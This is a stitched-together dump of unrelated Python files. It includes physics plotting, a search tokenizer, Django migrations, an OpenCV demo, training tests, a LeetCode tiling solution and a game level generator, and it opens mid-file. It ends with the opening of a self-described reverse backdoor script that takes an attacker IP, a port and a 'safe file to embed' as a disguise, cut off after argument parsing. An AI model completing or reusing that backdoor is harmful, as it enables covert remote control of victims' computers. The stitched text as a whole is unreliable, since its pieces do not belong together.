A([ 51.6622, 47.394 , 61.4086, ..., 61.0178, 66.7235, 47.1538], dtype=float32)
In [59]: t0[np.where(flg[:,2] == 123)]
A([ 1400. , 1400. , 1400. , ..., 2021.8895, 1400. , 1400. ], dtype=float32)
::
In [13]: count_unique(ib) # signed 1-based boundaries encode inner/outer
Out[13]:
array([[ -125., 4696.],
[ -2., 58316.],
[ 2., 506.],
[ 124., 35537.],
[ 125., 945.]])
In [35]: count_unique(ub) # unsigned 0-based boundaries, for lookup against the blib, 58316 + 506 = 58822, 4696 + 945 = 5641
Out[35]:
array([[ 1, 58822],
[ 123, 35537],
[ 124, 5641]], dtype=uint64)
In [33]: print "\n".join(["%3d : %s " % (i, n) for i,n in enumerate(blib.names)])
0 : Vacuum///Vacuum
1 : Vacuum///Rock
2 : Rock///Air
3 : Air/NearPoolCoverSurface//PPE
4 : Air///Aluminium
5 : Aluminium///Foam
6 : Foam///Bakelite
...
119 : OwsWater/NearOutInPiperSurface//PVC
120 : OwsWater/NearOutOutPiperSurface//PVC
121 : DeadWater/LegInDeadTubSurface//ADTableStainlessSteel
122 : Rock///RadRock
"""
import os, sys, logging, numpy as np
log = logging.getLogger(__name__)
import matplotlib.pyplot as plt
#from opticks.ana.nbase import count_unique_sorted # doenst work with signed
from opticks.ana.nbase import count_unique
from opticks.ana.evt import Evt
from opticks.ana.proplib import PropLib
X,Y,Z,W = 0,1,2,3
if __name__ == '__main__':
from opticks.ana.main import opticks_main
#args = opticks_main(tag="1", det="boolean", src="torch")
ok = opticks_main()
blib = PropLib("GBndLib")
evt = Evt(tag=ok.tag, det=ok.det, src=ok.src, pfx=ok.pfx, args=ok)
if not evt.valid:
log.fatal("failed to load evt %s " % repr(args))
sys.exit(1)
ox = evt.ox
## assume layout written by oxrap/cu/generate.cu:tracetest ##
p0 = ox[:,0,:W]
d0 = ox[:,1,:W]
t0 = ox[:,1,W]
flg = ox[:,3].view(np.uint32) # u-flags
p1 = p0 + np.repeat(t0,3).reshape(-1,3)*d0 # intersect position
ub = flg[:,2] # unsigned boundary
ib = ox[:,2,W].view(np.int32) # signed boundary
b = 1
#b = 123
#b = 124
thin = slice(0,None,100)
s = np.where(ub == b)[0]
plt.ion()
plt.close()
#plt.scatter( p0[s,X], p0[s,Y] )
plt.scatter( p1[s,X], p1[s,Y] )
plt.show()
|
#
# (C) 2013 Varun Mittal <varunmittal91@gmail.com>
# JARVIS program is distributed under the terms of the GNU General Public License v3
#
# This file is part of JARVIS.
#
# JARVIS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 3 of the License.
#
# JARVIS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with JARVIS. If not, see <http://www.gnu.org/licenses/>.
#
import re
from uuid import uuid4
from datetime import datetime
from .exceptions import IncompleteParameters
stop_words = []
lists = ['en.list']
for list in lists:
file = open("jarvis_search/stop_word_list/%s" % list, "r")
words = file.read().split('\n')
words = [re.sub('[^a-zA-Z0-9\']', '', word.lower()) for word in words]
stop_words.extend(words)
class EsSearchDocument:
def __init__(self, **kwargs):
self.__config = {}
self.__config['body'] = kwargs.get('fields')
self.__config['id'] = kwargs.get('id', str(uuid4()))
self.__config['doc_type'] = kwargs.get('doc_type')
self.rank = kwargs.get('rank', datetime.now())
if not all(self.__config.values()):
raise IncompleteParameters(self.__config)
body = {}
for field in kwargs.get('fields'):
body[field.name] = field.value
body['_rank'] = self.rank
self.__config['body'] = body
self.doc_id = self.__config['id']
def getDoc(self, index_name):
self.__config['index'] = index_name
return self.__config
def __getitem__(self, name):
return self.__config['body'].get(name)
def __repr__(self):
return str(self.__config)
class EsFieldBase:
def __init__(self, name, value, language=None):
self.name = name
self.value = value
def __repr__(self):
return "%s:%s" % (self.name, self.value)
def tokenize_string(phrase):
a = []
for word in phrase.split():
if len(word) > 12 or word in stop_words:
continue
for j in xrange(3, len(word)):
for i in xrange(0, len(word)-j+1):
a.append(word[i:i+j])
a.extend(phrase.split())
return a
class EsStringField(EsFieldBase):
def __init__(self, **kwargs):
value = kwargs.get('value', "")
value = tokenize_string(value)
kwargs['value'] = " ".join(value)
EsFieldBase.__init__(self, **kwargs)
class EsTextField(EsFieldBase): pass
class EsArrayField(EsFieldBase):
def __init__(self, **kwargs):
assert(type(kwargs.get('value', [])), list)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2018-06-12 21:15
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('board', '0002_auto_20180518_1625'),
]
operations = [
migrations.AddField(
model_name='mediaprojeto',
name='significado',
field=models.TextField(default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='board',
name='data_criacao',
field=models.DateTimeField(default=datetime.datetime(2018, 6, 12, 21, 14, 56, 739648, tzinfo=utc), verbose_name='Submetido'),
),
migrations.AlterField(
model_name='board',
name='data_ultima_modificacao',
field=models.DateTimeField(default=datetime.datetime(2018, 6, 12, 21, 14, 56, 739648, tzinfo=utc), verbose_name='Modificado'),
),
migrations.AlterField(
model_name='board',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2018, 6, 12, 21, 14, 56, 739648, tzinfo=utc), verbose_name='Publicado'),
),
migrations.AlterField(
model_name='mediaprojeto',
name='data_criacao',
field=models.DateTimeField(default=datetime.datetime(2018, 6, 12, 21, 14, 56, 740649, tzinfo=utc), verbose_name='Submetido'),
),
migrations.AlterField(
model_name='mediaprojeto',
name='ordem',
field=models.IntegerField(default=-1, verbose_name='Ordem'),
),
]
|
from pathlib import Path
from datasets import load_dataset, Dataset
from datasets.config import HF_DATASETS_CACHE
from . import registration
from ..utils import get_hash
_OOV_DELIMITER = '|'
def get_gold_dataset(challenge_name: str, ignore_verification: bool = False):
d = load_dataset(
str((Path(__file__).parent.parent / 'hf_datasets_scripts' / 'challenge').resolve()),
name=f'{challenge_name}-answers',
split='test',
)
challenge_spec = registration.registry.get_spec(challenge_name)
if not ignore_verification and challenge_spec.hash is not None:
h = get_challenge_hash(d)
if challenge_spec.hash != h:
raise ValueError(wrong_hash_message.format(
hash=h,
expected_hash=challenge_spec.hash,
challenge=challenge_name,
))
return d
def get_challenge_hash(
dataset: Dataset,
test_only: bool = True,
hash_col: str = 'hashed_id',
delimiter: str = _OOV_DELIMITER,
):
if test_only and 'is_train' in dataset.features:
dataset = dataset.filter(lambda x: not x['is_train'])
return get_hash(delimiter.join(dataset[hash_col]))
wrong_hash_message = (
'Hash for challenge {challenge} ({hash}) different from expected hash ({expected_hash}).'
f' Please clear your Huggingface datasets cache ({HF_DATASETS_CACHE}) and try again.'
)
|
import cv2
import numpy as np
import argparse
ap=argparse.ArgumentParser()
ap.add_argument('-i','--image',required=True,help='Path to the image')
args=vars(ap.parse_args())
image=cv2.imread(args['image'])
image=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
image=cv2.GaussianBlur(image,(5,5),0)
cv2.imshow('Blurred',image)
canny=cv2.Canny(image,30,150)
cv2.imshow('Canny',canny)
cv2.waitKey(0)
|
import os
import sys
from PyQt4.Qt import *
class AboutView(object):
__layout = None
__leftBox = None
__rightBox = None
def __init__(self, layout):
self.__layout = layout
def initView(self):
self.__initLayouts()
self.__initPixelMap(self.__leftBox, "VU_icon.svg")
self.__initText(self.__leftBox, "App sponsored by: ")
self.__initPixelMap(self.__leftBox, "opto.jpg")
self.__initText(self.__rightBox, "About this app")
def __initLayouts(self):
hBox = QHBoxLayout()
self.__leftBox = QVBoxLayout()
self.__leftBox.setAlignment(Qt.AlignCenter)
self.__rightBox = QVBoxLayout()
hBox.addLayout(self.__leftBox)
hBox.addLayout(self.__rightBox)
self.__layout.addLayout(hBox)
@staticmethod
def __initPixelMap(layout, logoName):
pathToLogo = os.path.join(os.path.dirname(sys.modules[__name__].__file__), logoName)
label = QLabel()
pixelMap = QPixmap(pathToLogo)
label.setPixmap(pixelMap)
layout.addWidget(label)
@staticmethod
def __initText(layout, text):
label = QLabel()
label.setText(text)
layout.addWidget(label)
|
import pycurl
from StringIO import StringIO
for line in open('sites.txt').xreadlines():
buffer = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, line.rstrip())
c.setopt(c.WRITEDATA, buffer)
c.perform()
print line + " status code: %s" % c.getinfo(pycurl.HTTP_CODE)
c.close()
# Body is a string in some encoding.
# In Python 2, we can print it without knowing what the encoding is.
#
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Proposal.created'
db.add_column(u'landing_proposal', 'created',
self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, default=datetime.datetime(2014, 12, 15, 0, 0), blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Proposal.created'
db.delete_column(u'landing_proposal', 'created')
models = {
u'landing.proposal': {
'Meta': {'object_name': 'Proposal'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'null': 'True', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'tour': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['landing.Tour']", 'null': 'True', 'blank': 'True'})
},
u'landing.tour': {
'Meta': {'object_name': 'Tour'},
'aboutHotel': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'dateDeparture': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nameHotel': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'nameTour': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'piece': ('django.db.models.fields.IntegerField', [], {}),
'starHotel': ('django.db.models.fields.IntegerField', [], {}),
'time': ('django.db.models.fields.CharField', [], {'max_length': '250'})
}
}
complete_apps = ['landing']
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#################################################################################
# #
# clean_table.py: clean up op_limits.db table #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 10, 2021 #
# #
#################################################################################
import os
import sys
import re
import string
import time
import random
import math
#
#--- reading directory list
#
path = '/data/mta/Script/MSID_limit/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
sys.path.append(mta_dir)
import mta_common_functions as mcf
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#
#--- database file name
#
db_file = main_dir + 'op_limits.db'
#-------------------------------------------------------------------------------
#-- clean_table: clean up op_limits.db -
#-------------------------------------------------------------------------------
def clean_table():
"""
clean up op_limits.db
input: op_limits.db
output: cleaned up op_limits.db
"""
#
#--- if the change was a made a while ago, don't clean up
#
current = time.time()
updated = os.path.getmtime(db_file)
diff = current - updated
if diff > 1800:
exit(1)
#
#--- first, correct data format; the data part is delimited by tab, not a space
#
data = mcf.read_data_file(db_file)
save = []
for ent in data:
if ent == '':
save.append('')
elif ent[0] == '#':
save.append(ent)
continue
else:
atemp = re.split('#', ent)
btemp = re.split('\s+', atemp[0])
if len(btemp[0]) < 8:
line =btemp[0].strip() + '\t\t'
else:
line =btemp[0].strip() + '\t'
line = line + '%0.2f\t' % round(float(btemp[1].strip()), 2)
line = line + '%0.2f\t' % round(float(btemp[2].strip()), 2)
line = line + '%0.2f\t' % round(float(btemp[3].strip()), 2)
line = line + '%0.2f\t' % round(float(btemp[4].strip()), 2)
line = line + '%0.1f\t' % round(float(btemp[5].strip()), 2)
try:
line = line + '#' + atemp[1]
except:
pass
save.append(line)
#
#--- now reorder each msid entry by time and remove duplicates
#
msid_list = []
prev = ''
m_dict = {}
#
#--- first collect all entries of each msid and create msid list and disctionary
#--- with msid as a key. the dict points to a lists holds all entries of each msid
#
for ent in save:
if ent == '':
continue
chk = 0
if ent[0] == '#':
continue
else:
atemp = re.split('\s+', ent)
msid = atemp[0]
try:
out = m_dict[msid]
except:
out = []
out.append(ent)
m_dict[msid] = out
if msid != prev:
if msid in msid_list:
continue
else:
if not (msid in msid_list):
msid_list.append(msid)
prev = msid
continue
else:
continue
#
#--- go through each msid/dict entry and remove duplicate and sort in time order
#
for msid in msid_list:
t_dict = {}
t_list = []
for ent in m_dict[msid]:
atemp = re.split('\t+', ent)
stime = float(atemp[5])
t_dict[stime] = ent
t_list.append(stime)
t_list = sorted(list(set(t_list)))
out = []
for stime in t_list:
out.append(t_dict[stime])
m_dict[msid] = out
#
#--- back to the table and print create a clean table
#
line = ''
prev = ''
done = []
for ent in data:
if ent == '':
line = line + '\n'
elif ent[0] == '#':
line = line + ent + '\n'
continue
else:
atemp = re.split('\s+', ent)
msid = atemp[0].replace('#', '')
if msid == prev:
continue
if msid in done:
prev = msid
continue
done.append(msid)
out = m_dict[msid]
for val in out:
line = line + val + '\n'
prev = msid
#
#--- update the op_limits.db
#
cmd = 'mv ' + db_file + ' ' + db_file + '~'
os.system(cmd)
with open(db_file, 'w') as fo:
fo.write(line)
cmd = 'cp -f ' + db_file + ' /data/mta4/MTA/data/op_limits/op_limits.db'
os.system(cmd)
#-------------------------------------------------------------------------------
#-- check_entry: check whether new op_limit.db is missing any entries from the older data set
#-------------------------------------------------------------------------------
def check_entry():
"""
check whether new op_limit.db is missing any entries from the older data set
input: none but read from <past_dir>/op_limits.db_<mmddyy>
output: email notification sent out if it find a missing data
"""
cmd = 'ls -lrt ' + main_dir + '/Past_data/op_limits* > ' + zspace
os.system(cmd)
olist = mcf.read_data_file(zspace, remove=1)
out = olist[-1]
atemp = re.split('\s+', out)
lfile1 = atemp[-2]
lfile2 = atemp[-1]
cmd = 'diff ' + lfile1 + ' ' + lfile2 + ' > ' + zspace
os.system(cmd)
out = mcf.read_data_file(zspace, remove=1)
missing = []
for ent in out:
if ent[0] == ">":
continue
else:
missing.append(ent)
if len(missing) > 0:
line = 'Following lines are missing/different in the updata data from the past data:\n\n'
for ent in missing:
line = line + ent + '\n'
with open(zspace, 'w') as fo:
fo.write(line)
cmd = 'cat ' + zspace + ' |mailx -s "Subject: Possible op_limit Problems" tisobe@cfa.harvard.edu'
os.system(cmd)
mcf.rm_files(zspace)
#------------------------------------------------------------------------
if __name__ == "__main__":
clean_table()
check_entry()
|
from event_bot import EventBot
|
import time
import shutil
import subprocess
import pytest
from dps.run import _run
from dps.rl.algorithms.a2c import reinforce_config
from dps.train import training_loop, Hook
from dps.env.advanced import translated_mnist
from dps.env.advanced import simple_addition
from dps.config import DEFAULT_CONFIG
from dps.utils import Alarm
from dps.utils.tf import get_tensors_from_checkpoint_file
@pytest.mark.slow
def test_time_limit(test_config):
config = DEFAULT_CONFIG.copy()
config.update(simple_addition.config)
config.update(reinforce_config)
config.update(max_time=120, max_steps=10000, seed=100)
config.update(test_config)
start = time.time()
with config:
training_loop()
elapsed = start - time.time()
assert elapsed < config.max_time + 1
class AlarmHook(Hook):
def __init__(self, start, stage_idx):
self.start = start
self.stage_idx = stage_idx
super(AlarmHook, self).__init__()
def start_stage(self, training_loop, stage_idx):
if self.start and stage_idx == self.stage_idx:
raise Alarm("Raised by AlarmHook")
def end_stage(self, training_loop, stage_idx):
if not self.start and stage_idx == self.stage_idx:
raise Alarm("Raised by AlarmHook")
@pytest.mark.slow
def test_time_limit_between_stages(test_config):
config = DEFAULT_CONFIG.copy()
config.update(simple_addition.config)
config.update(reinforce_config)
config.update(max_time=120, max_steps=10, seed=100)
config.update(hooks=[AlarmHook(False, 0)])
config.update(test_config)
start = time.time()
with config:
result = training_loop()
print(result)
elapsed = start - time.time()
assert elapsed < 20
class DummyHook(Hook):
def __init__(self, n_stages, base_config):
self.n_stages = n_stages
self.base_config = base_config
super(DummyHook, self).__init__()
def _attrs(self):
return "n_stages base_config".split()
def end_stage(self, training_loop, stage_idx):
if stage_idx < self.n_stages - 1:
training_loop.edit_remaining_stage(0, self.base_config)
def test_stage_hook(test_config):
""" Test that we can safely use hooks to add new stages. """
config = DEFAULT_CONFIG.copy()
config.update(simple_addition.config)
config.update(reinforce_config)
config.update(
max_steps=11, eval_step=10, n_train=100, seed=100,
hooks=[DummyHook(3, dict(max_steps=21))],
curriculum=[dict()],
width=1,
)
config.update(test_config)
with config:
data = training_loop()
assert data.n_stages == 3
assert not data.history[0]["stage_config"]
assert data.history[1]["stage_config"]["max_steps"] == 21
assert data.history[2]["stage_config"]["max_steps"] == 21
def grep(pattern, filename, options=""):
return subprocess.check_output(
'grep {} "{}" {}'.format(options, pattern, filename),
shell=True).decode()
def test_train_data(test_config):
config = test_config.copy()
config.update(max_steps=101, checkpoint_step=43, eval_step=100)
frozen_data = _run('hello_world', 'a2c', _config=config)
# train
train0 = frozen_data.step_data('train', 0)
assert train0.shape[0] == 101
assert (train0['stage_idx'] == 0).all()
train1 = frozen_data.step_data('train', 1)
assert train1.shape[0] == 101
assert (train1['stage_idx'] == 1).all()
train2 = frozen_data.step_data('train', 2)
assert train2.shape[0] == 101
assert (train2['stage_idx'] == 2).all()
trainNone = frozen_data.step_data('train', None)
assert trainNone.shape[0] == 303
assert trainNone.ix[0, 'stage_idx'] == 0
assert trainNone.ix[0, 'local_step'] == 0
assert trainNone.ix[0, 'global_step'] == 0
assert trainNone.iloc[-1]['stage_idx'] == 2
assert trainNone.iloc[-1]['local_step'] == 100
assert trainNone.iloc[-1]['global_step'] == 302
train03 = frozen_data.step_data('train', (0, 3))
assert (trainNone == train03).all().all()
trainSlice03 = frozen_data.step_data('train', slice(0, 3))
assert (trainNone == trainSlice03).all().all()
# off_policy
off_policy = frozen_data.step_data('off_policy', 0)
assert off_policy is None
# val
val0 = frozen_data.step_data('val', 0)
assert val0.shape[0] == 2
assert (val0['stage_idx'] == 0).all()
val1 = frozen_data.step_data('val', 1)
assert val1.shape[0] == 2
assert (val1['stage_idx'] == 1).all()
val2 = frozen_data.step_data('val', 2)
assert val2.shape[0] == 2
assert (val2['stage_idx'] == 2).all()
valNone = frozen_data.step_data('val', None)
assert valNone.shape[0] == 6
assert valNone.ix[0, 'stage_idx'] == 0
assert valNone.ix[0, 'local_step'] == 0
assert valNone.ix[0, 'global_step'] == 0
assert valNone.iloc[-1]['stage_idx'] == 2
assert valNone.iloc[-1]['local_step'] == 100
assert valNone.iloc[-1]['global_step'] == 302
val03 = frozen_data.step_data('val', (0, 3))
assert (valNone == val03).all().all()
valSlice03 = frozen_data.step_data('val', slice(0, 3))
assert (valNone == valSlice03).all().all()
# test
test0 = frozen_data.step_data('test', 0)
assert test0.shape[0] == 2
assert (test0['stage_idx'] == 0).all()
test1 = frozen_data.step_data('test', 1)
assert test1.shape[0] == 2
assert (test1['stage_idx'] == 1).all()
test2 = frozen_data.step_data('test', 2)
assert test2.shape[0] == 2
assert (test2['stage_idx'] == 2).all()
testNone = frozen_data.step_data('test', None)
assert testNone.shape[0] == 6
assert testNone.ix[0, 'stage_idx'] == 0
assert testNone.ix[0, 'local_step'] == 0
assert testNone.ix[0, 'global_step'] == 0
assert testNone.iloc[-1]['stage_idx'] == 2
assert testNone.iloc[-1]['local_step'] == 100
assert testNone.iloc[-1]['global_step'] == 302
test03 = frozen_data.step_data('test', (0, 3))
assert (testNone == test03).all().all()
testSlice03 = frozen_data.step_data('test', slice(0, 3))
assert (testNone == testSlice03).all().all()
@pytest.mark.slow
def test_fixed_variables(test_config):
""" Test that variables stay fixed when we use use `ScopedFunction.fix_variables`. """
digits = [0, 1]
config = translated_mnist.config.copy(
env_name="test_fixed_variables", render_step=0, n_patch_examples=1000,
value_weight=0.0, opt_steps_per_update=20, image_shape=(20, 20),
max_steps=101, eval_step=10, use_gpu=False, seed=1034340,
model_dir="/tmp/dps_test/models", n_train=100, digits=digits
)
config['emnist_config:threshold'] = 0.1
config['emnist_config:n_train'] = 1000
config['emnist_config:classes'] = digits
config.emnist_config.update(test_config)
try:
shutil.rmtree(config.model_dir)
except FileNotFoundError:
pass
config.update(test_config)
config.update(fix_classifier=False, pretrain_classifier=True)
# ------------- First run
_config = config.copy(name="PART_1")
output = _run("translated_mnist", "a2c", _config=_config)
load_path1 = output.path_for('weights/best_of_stage_0')
tensors1 = get_tensors_from_checkpoint_file(load_path1)
prefix = "{}/digit_classifier".format(translated_mnist.AttentionClassifier.__name__)
relevant_keys = [key for key in tensors1 if key.startswith(prefix)]
assert len(relevant_keys) > 0
# ------------- Second run, reload, no training
_config = config.copy(
name="PART_2",
fix_classifier=True,
pretrain_classifier=False,
load_path=load_path1,
do_train=False,
)
output = _run("translated_mnist", "a2c", _config=_config)
load_path2 = output.path_for('weights/best_of_stage_0')
tensors2 = get_tensors_from_checkpoint_file(load_path2)
for key in relevant_keys:
assert (tensors1[key] == tensors2[key]).all(), "Error on tensor with name {}".format(key)
# ------------- Third run, reload with variables fixed, do some training, assert that variables haven't changed
_config = config.copy(
name="PART_3",
fix_classifier=True,
pretrain_classifier=False,
load_path=load_path1,
max_steps=101,
do_train=True,
)
output = _run("translated_mnist", "a2c", _config=_config)
load_path3 = output.path_for('weights/best_of_stage_0')
tensors3 = get_tensors_from_checkpoint_file(load_path3)
for key in relevant_keys:
assert (tensors1[key] == tensors3[key]).all(), "Error on tensor with name {}".format(key)
# ------------- Fourth run, reload with variables NOT fixed, do some training, assert that the variables are different
_config = config.copy(
name="PART_4",
fix_classifier=False,
pretrain_classifier=False,
load_path=load_path1,
max_steps=101,
do_train=True,
)
output = _run("translated_mnist", "a2c", _config=_config)
load_path4 = output.path_for('weights/best_of_stage_0')
tensors4 = get_tensors_from_checkpoint_file(load_path4)
for key in relevant_keys:
assert (tensors1[key] != tensors4[key]).any(), "Error on tensor with name {}".format(key)
|
# 状态递推
# 矩阵快速幂优化
# 轻轻松松!!!
MOD = 10**9 + 7
class Solution:
def numTilings(self, n: int) -> int:
t1, t2, t3, t4 = 1, 0, 0, 1
for i in range(2, n+1):
h1, h2, h3, h4 = t1, t2, t3, t4
t1 = h4 % MOD
t2 = (h1 + h3) % MOD
t3 = (h1 + h2) % MOD
t4 = (h1 + h2 + h3 + h4) % MOD
return t4
# #define rep(i,l,r) for(int i=(l);i<=(r);++i)
# #define rpe(i,r,l) for(int i=(r);i>=(l);--i)
# inline int max(int x,int y){return x>y?x:y;}
# #define M 1000000007
# typedef long long ll;
# typedef vector<ll> vec;
# typedef vector<vec> mat; // 矩阵
# // 递推式&矩阵快速幂 问题
# // 计算A*B
# mat mul(mat& A, mat& B) {
# // A (ma * na) B (mb * nb) => C(ma * nb)
# mat C(A.size(), vec(B[0].size()));
# for (int i = 0; i < A.size(); i++) {
# for (int k = 0; k < B.size(); k++) {
# for (int j = 0; j < B[0].size(); j++) {
# C[i][j] += A[i][k] * B[k][j];
# C[i][j] %= M;
# }
# }
# }
# return C;
# }
# // 快速幂计算A^n
# mat pow(mat A, int n) {
# mat B(A.size(), vec(A.size())); //base
# for (int i = 0; i < A.size(); i++) {
# B[i][i] = 1;
# }
# while (n > 0) {
# if (n & 1) B = mul(B, A);
# A = mul(A, A);
# n >>= 1;
# }
# return B;
# }
# /*-------------------矩阵快速幂模板----------------------------*/
# class Solution {
# public:
# int numTilings(int n) {
# // 初始矩阵
# mat B(4, vec(1));
# B[0][0] = B[3][0] = 1;
# B[1][0] = B[2][0] = 0;
# // 递推矩阵
# mat A(4,vec(4,0));
# A[0][3] = A[1][0] = A[1][2] = A[2][0] = A[2][1] = A[3][0] = A[3][1] = A[3][2] = A[3][3] = 1;
# A = pow(A, n-1);
# B = mul(A, B);
# return B[3][0];
# }
# };
# 作者:bosshhh
# 链接:https://leetcode-cn.com/problems/domino-and-tromino-tiling/solution/python-c-ju-zhen-kuai-su-mi-ji-bai-100-b-izrz/
# 来源:力扣(LeetCode)
# 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import blocks
import boosts
import monsters
import random
import config_level_generator as clg
from config_entity import WIDTH
class LevelGenerator:
def __init__(self, game):
self.game = game
self.locked_coordinates = []
self.right_width = clg.WIDTH_IN_BLOCKS - 2
self.center = self.right_width // 2
def get_level(self):
self.choose_booster()
self.make_exit_hider()
self.make_booster_hider()
self.make_hard_platforms()
self.make_monsters()
self.make_simple_platforms()
self.locked_coordinates.clear()
def choose_booster(self):
if self.game.hero.level % 20 == 0:
self.booster = 2
elif self.game.hero.level % 10 == 0:
self.booster = 3
else:
self.booster = random.randint(0, 1)
def make_exit_hider(self):
exit_y = random.randint(1, 9)
if exit_y < clg.SAFE_ZONE:
if exit_y % 2 == 0:
exit_x = random.randint(clg.SAFE_ZONE, self.center * 2 + 1)
else:
exit_x = random.randint(clg.SAFE_ZONE, self.right_width)
else:
if exit_y % 2 == 0:
exit_x = random.randint(1, self.center * 2 + 1)
else:
exit_x = random.randint(1, self.right_width)
self.locked_coordinates.append((exit_x, exit_y))
self.game.exit = blocks.ExitDoor(exit_x * WIDTH, exit_y * WIDTH)
self.game.exit_hider = blocks.Platform(exit_x * WIDTH, exit_y * WIDTH)
self.game.add_sprite(self.game.exit_hider)
def make_booster_hider(self):
while True:
boost_y = random.randint(1, clg.HEIGHT_IN_BLOCKS - 3)
if boost_y < clg.SAFE_ZONE:
if boost_y % 2 == 0:
boost_x = random.randint(clg.SAFE_ZONE,
self.center * 2 + 1)
else:
boost_x = random.randint(clg.SAFE_ZONE, self.right_width)
else:
if boost_y % 2 == 0:
boost_x = random.randint(1, self.center * 2 + 1)
else:
boost_x = random.randint(1, self.right_width)
if (boost_x, boost_y) in self.locked_coordinates:
continue
else:
break
self.locked_coordinates.append((boost_x, boost_y))
if self.booster == 0:
self.game.boost = boosts.Additional_Life(boost_x * WIDTH,
boost_y * WIDTH)
elif self.booster == 1:
self.game.boost = boosts.Strength_Up(boost_x * WIDTH,
boost_y * WIDTH)
elif self.booster == 2:
self.game.boost = boosts.Remote_Bombs_Boost(boost_x * WIDTH,
boost_y * WIDTH)
else:
self.game.boost = boosts.Many_Bombs_Boost(boost_x * WIDTH,
boost_y * WIDTH)
self.game.boost_hider = blocks.Platform(boost_x * WIDTH,
boost_y * WIDTH)
self.game.add_sprite(self.game.boost_hider)
def make_hard_platforms(self):
for x in range(clg.WIDTH_IN_BLOCKS):
for y in range(clg.HEIGHT_IN_BLOCKS):
if(x == 0 or y == 0 or x == clg.WIDTH_IN_BLOCKS - 1
or y == clg.HEIGHT_IN_BLOCKS - 1
or (x % 2 == 0 and y % 2 == 0)):
pf = blocks.Hard_Platform(x * WIDTH, y * WIDTH)
self.game.add_sprite(pf)
def make_monsters(self):
types_of_monsters = 1
if self.game.hero.level > 15:
types_of_monsters = 3
elif self.game.hero.level > 5:
types_of_monsters = 2
for _ in range(1, min(15, 5 + self.game.hero.level // 5)):
monster_x = monster_y = 0
while True:
monster_y = random.randint(1, clg.HEIGHT_IN_BLOCKS - 3)
if monster_y < clg.SAFE_ZONE - 1:
if monster_y % 2 == 0:
monster_x = random.randint(clg.SAFE_ZONE - 1,
self.center * 2 + 1)
else:
monster_x = random.randint(clg.SAFE_ZONE - 1,
self.right_width)
else:
if monster_y % 2 == 0:
monster_x = random.randint(1, self.center * 2 + 1)
else:
monster_x = random.randint(1, self.right_width)
if (monster_x, monster_y) in self.locked_coordinates:
continue
else:
break
monster_type = random.randint(1, types_of_monsters)
if monster_type == 1:
monster = monsters.Baloon(monster_x * WIDTH, monster_y * WIDTH)
self.game.baloon_monsters.append(monster)
elif monster_type == 2:
monster = monsters.Shadow(monster_x * WIDTH, monster_y * WIDTH)
self.game.shadow_monsters.append(monster)
else:
monster = monsters.Chaser(monster_x * WIDTH, monster_y * WIDTH)
self.game.chaser_monsters.append(monster)
self.game.add_sprite(monster)
self.locked_coordinates.append((monster_x, monster_y))
def make_simple_platforms(self):
for _ in range(1, 60):
block_x = block_y = 0
while True:
block_y = random.randint(1, 9)
if block_y < clg.SAFE_ZONE - 3:
if block_y % 2 == 0:
block_x = random.randint(clg.SAFE_ZONE - 3,
self.center * 2 + 1)
else:
block_x = random.randint(clg.SAFE_ZONE - 3,
self.right_width)
else:
if block_y % 2 == 0:
block_x = random.randint(1, self.center * 2 + 1)
else:
block_x = random.randint(1, self.right_width)
if (block_x, block_y) in self.locked_coordinates:
continue
else:
break
pf = blocks.Platform(block_x * WIDTH, block_y * WIDTH)
self.game.add_sprite(pf)
self.locked_coordinates.append((block_x, block_y))
|
import numpy as np
gamma = 0.99
positive_reward = 10
negative_reward = -10
for i in range(500):
positive_reward = gamma * positive_reward - 0
for i in range(500):
negative_reward = gamma * negative_reward - 0
print('positive_reward', positive_reward)
print('negative_reward', negative_reward)
print(np.linspace(-10, 10, 51))
|
#! /usr/bin/python
"""A simple reverse backdoor script.
Uses Python 2.7.16"""
import subprocess
import optparse
import shutil
import base64
import socket
import json
import sys
import os
def get_arguments():
"""Get user supplied arguments from terminal."""
parser = optparse.OptionParser()
# arguments
parser.add_option('-a', '--attacker', dest='attacker', help='Attacking host IP.')
parser.add_option('-p', '--port', dest='port', help='Port to connect to.')
parser.add_option('-f', '--file', dest='file', help='Safe file to embed.')
(options, arguments) = parser.parse_args()
